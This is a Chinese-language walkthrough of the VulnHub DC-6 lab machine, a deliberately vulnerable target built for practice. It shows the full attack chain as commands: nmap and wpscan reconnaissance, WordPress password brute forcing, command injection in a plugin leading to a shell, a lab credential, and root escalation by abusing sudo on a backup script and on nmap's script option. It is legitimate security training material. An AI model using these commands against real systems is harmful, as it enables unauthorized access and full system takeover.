靶机入侵——DC6
1、环境搭建
下载地址:https://www.vulnhub.com/entry/dc-6,315/
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
2、信息收集
-
主机发现
使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
192.168.80.135 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24 -
端口扫描
使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.135
发现开放了80、22端口,且网站重定向,需要修改host文件才能访问 -
web端进一步信息收集
修改host文件访问网站:192.168.80.135 wordy
通过wappalyzer 插件我们收集到站点的cms、中间件、语言等信息
-
因为站点使用wordpress搭建,我们可以使用其专用扫描器wpscan对其进行扫描,看是否能获得突破点
3、漏洞探测与利用
-
扫描可能存在的用户名:wpscan --url wordy -e -u
-
一共获得5个用户名,接下来进行爆破:wpscan --url wordy -U user.txt -P passwords.txt。
根据官网提示生成字典:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
成功获得一个账号密码
-
wordpress的默认登录路径是/wp-login.php,使用爆破的账号尝试登录。
-
成功登录后,在后台找突破点,最终在activity monitor插件中找到lookup可以进行域名解析,尝试进行拼接命令执行。
-
抓到包后,通过拼接命令反弹shell。这里使用一种方式。
searchsploit activity monitor 搜索漏洞可利用POC
可以直接使用python脚本直接getshell,这里使用更有意思的html点击上线的攻击手法(csrf),使用45274.html
攻击机开启http服务,在登录目标站点的后台的情况下访问此页面。
成功getshell
4、权限提升
-
使用python获得交互式shell方便操作:python -c ‘import pty;pty.spawn(“/bin/bash”)’
-
查看目标主机文件,发现一个可登录SSH服务的账户:graham/ GSo7isUM1D4
-
SSH登录,查看免密使用的root级别命令:sudo -l
发现jens用户可以执行一个命令文件
-
尝试向/home/jens/backups.sh 写入命令,并以jens 身份执行。
这里可以尝试向backups.sh文件写入/bin/bash 并且以jens用户去执行该脚本
echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh
成功切换到jens用户
-
sudo -l 查看可提权命令
-
发现可无密码以root权限运行nmap
nmap的–script参数可以执行脚本,脚本是用lua语言写的。 进入/tmp目录执行命令,利用命令:
echo ‘os.execute(“/bin/bash”)’>getroot.sh
sudo nmap --script=getroot.sh
-
成功获得flag,但有一个奇怪的问题,nmap获得的rootshell无法显示输入,但确实是成功输入了命令,有回显。